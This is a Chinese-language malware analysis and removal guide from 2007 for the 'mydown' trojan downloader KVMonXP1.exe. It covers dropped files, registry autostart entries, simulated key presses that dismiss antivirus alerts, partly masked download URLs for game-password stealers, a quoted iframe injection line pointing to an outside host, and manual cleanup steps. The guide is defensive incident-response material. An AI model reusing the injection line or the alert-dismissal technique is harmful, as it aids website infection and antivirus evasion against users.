mydown(KVMonXP1.exe)下载者分析查杀

最近比较流行的一个下载者，作者在病毒体内注明“mydown”,并且病毒几乎每日更新版本。

File: KVMonXP1.exe

Size: 28544 bytes

Modified: 2007年10月14日, 18:09:06

MD5: 4BEE5CDF02452751B7B62AC0CF3FA694

SHA1: 15B288B86BBF1503EE8C059A0E947D55A.5C392E8

CRC32: D0979BB4

杀软命名：Trojan.DL.Win32.MyDown.d（瑞星）

技术细节：

1.生成如下文件

%Program Files%\\Internet Explorer\\KVMonXP1.exe（仿冒KV的监控进程）

%Program Files%\\Internet Explorer\\use1.dll

%Program Files%\\Internet Explorer\\user32.dll

2.添加注册表启动项目

在HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run下面添加

{main}{rundll32.exe "%Program Files%\\internet explorer\\use1.dll" mymain} 的启动项目 达到开机启动的目的

3.查找如下窗口并且模拟按键导致.相应的安全软件失效

“IE执行保护”－－“允许执行”

“瑞星卡卡上网安全助手-IE防漏墙”－－“允许”

查找卡巴斯基的如下窗口并模拟按键

“主动防御信息”－－“允许”

“主动防御警报”－－“允许”

“主动防御警告”－－“允许”

“主动防护提示”－－“允许”

“主动防护警告”－－“允许”

“主动防护警报”－－“允许”

“主动防护信息”－－“允许”

“创建规则”－－“跳过”

“通信监控：终止连接”－－“否”

查找如下窗口

“Kaspersky Anti-Virus: 通知” 并模拟按.键关闭该窗口

4.病毒体内有字样“mydown”

5.连接网络

读取http://web.*/soft/test.txt的下载列表下载木马

http://web.*/soft/versoft.exe

http://web.*/soft/1.exe~http://web.*/soft/9.exe

http://web.*/soft/a.exe~http://web.*/soft/f.exe

其中http://web.*/soft/versoft.exe链接已失效，猜想是为了.更新病毒自身所用

其他为盗号木马或者感染类病毒

其中http://web.*/soft/c.exe为感染htm,asp文件的病毒

会在htm,asp等文件尾部加入{/html}{iframe src=http://mm.987999*/abc.htm width=100 height=0}{/iframe}的代码

并建立服务Remote Help Session Manager / Rasautol

其他为盗号木马

主要盗取如下网络游戏.的帐号和密码

QQ

魔兽世界

梦幻西游

天龙八部

...

木马全部植入完毕以后，sreng日志如下：

启动项目

注册表

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

{DiskMan32}{%systemroot%\\DiskMan32.exe} []

{cmdbcs}{%systemroot%\\cmdbcs.exe} []

{AVPSrv}{%systemroot%\\AVPSrv.exe} []

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run]

{MSDEG32}{LYLoader.exe} []

{MSDWG32}{LYLoadbr.exe} [N/A]

{MSDCG32 }{LY.Leador.exe} [N/A]

{MSDOG32}{LYLoador.exe} [N/A]

{MSDSG32}{LYLoadar.exe} [N/A]

{MSDMG32}{LYLoadmr.exe} [N/A]

{MSDHG32}{LYLoadhr.exe} [N/A]

{MSDQG32}{LYLoadqr.exe} [N/A]

{main}{rundll32.exe "%Program Files%\\internet explorer\\use1.dll" mymain} [N/A]

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]

{AppInit_DLLs}{rsztcpm.dll} []

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\

ShellExecuteHooks]

{{E418E9ED-9221-4661-B1F3-4AA35BD83832}}{%Program Files%\\Internet Explorer\\PLUGINS\\WinSys88.Sys} []

{{4859245F-345D-BC13-AC4F-145D47DA34F4}}{%systemroot%\\system32\\avzxdmn.dll} []

{{334345F1-DACF-3452-CB7D-4620F34A1533}}{%systemroot%\\system32\\rsztcpm.dll} []

{{28907901-1416-3389-9981-372178569982}}{%systemroot%\\system32\\kawdbzy.dll} []

==================================

服务

[Remote Help Session Manager / Rasautol][Stopped/Auto Start]

{%systemroot%\\system32\ts.okele.exe}{N/A}

解决方法：

下载 sreng

http://download.kztechs.com/files/sreng2.zip

1.打开sreng

启动项目 注册表 删除如下项目

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

{DiskMan32}{%systemroot%\\DiskMan32.exe} []

{cmdbcs}{%systemroot%\\cmdbcs.exe} []

{AVPSrv}{%systemroot%\\AVPSrv.exe} []

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run]

{MSDEG32}{LYLoader.exe} []

{MSDWG32}{LYLoadbr.exe} [N/A]

{MSDCG32 }{LYLeador.exe} [N/A]

{MSDOG32}{LYLoador.exe} [N/A]

{MSDSG32}{LYLoadar.exe} [N/A]

{MSDMG32}{LYLoadmr.exe} [N/A]

{MSDHG32}{LYLoadhr.exe} [N/A]

{MSDQG32}{LYLoadqr.exe} [N/A]

{main}{rundll32.exe "%Program Files%\\internet explorer\\use1.dll" mymain} [N/A]

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\

ShellExecuteHooks]

{{E418E9ED-9221-4661-B1F3-4AA35BD83832}}{%Program Files%\\Internet Explorer\\PLUGINS\\WinSys88.Sys} []

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，

选中以下项目，点“删除服务”，再点“设置”，在弹.出的框中点“否”：

[Remote Help Session Manager / Rasautol][Stopped/Auto Start]

{%systemroot%\\system32\tsokele.exe}{N/A}

2.双击我的电脑，工具，文件夹.选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系.统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定

然后点击 菜单栏中的 搜索按钮

依次搜索%systemroot%\\system32\\avzxdmn.dll

%systemroot%\\system32\\rsztcpm.dll

%systemroot%\\system32\\kawdbzy.dll

注意勾选 左边高级选项的“搜索隐藏的文件和文件夹”

（插入图snap1）

找到后右键选中该文件 把他们重命名（最好有规律，比如1，2，3）

3.重启计算机

删除如下文件

%Program Files%\\Internet Explorer\\KVMonXP1.exe

%Program Files%\\Internet Explorer\\use1.dll

%Program Files%\\Internet Explorer\\user32.dll

%systemroot%\\system32\tsokele.exe

%systemroot%\\DiskMan32.exe

%systemroot%\\cmdbcs.exe

%systemroot%\\AVPSrv.exe

%systemroot%\\system32\\AVPSrv.dll

%systemroot%\\system32\\cmdbcs.dll

%systemroot%\\system32\\DiskMan32.dll

%systemr.oot%\\system32\\kawdacs.dll

%systemroot%\\system32\\kawdbaz.exe

%systemroot%\\system32\\kawdbzy.dll

%systemroot%\\system32\\LYLOADER.EXE

%systemroot%\\system32\\LYMANGR.DLL

%systemroot%\\system32\\MSDEG32.DLL

%systemroot%\\system32\slookupi.exe

%Program Files%\\Internet Explorer\\PLUGINS\\WinSys88.Sys

以及你刚重命名的

%systemroot%\\system32\\avzxdmn.dll

%systemroot%\\system32\\rsztcpm.dll

%systemroot%\\system32\\kawdbzy.dll

...

再次.打开sreng

启动项目 注册表 删除如下项目

{{4859245F-345D-BC13-AC4F-145D47DA34F4}}{%systemroot%\\system32\\avzxdmn.dll} []

{{334345F1-DACF-3452-CB7D-4620F34A1533}}{%systemroot%\\system32\\rsztcpm.dll} []

{{28907901-1416-3389-9981-372178569982}}{%systemroot%\\system32\\kawdbzy.dll} []

双击AppInit_DLLs把其键值清空

4.修复受感染的htm,asp等网页文件

推荐使用CSI的iframkill

下载地址：http://www.vaid.cn/blog/read.php?9

【原文地址：http://secure.itdigger.com/2007/10/15/090438171.htm 】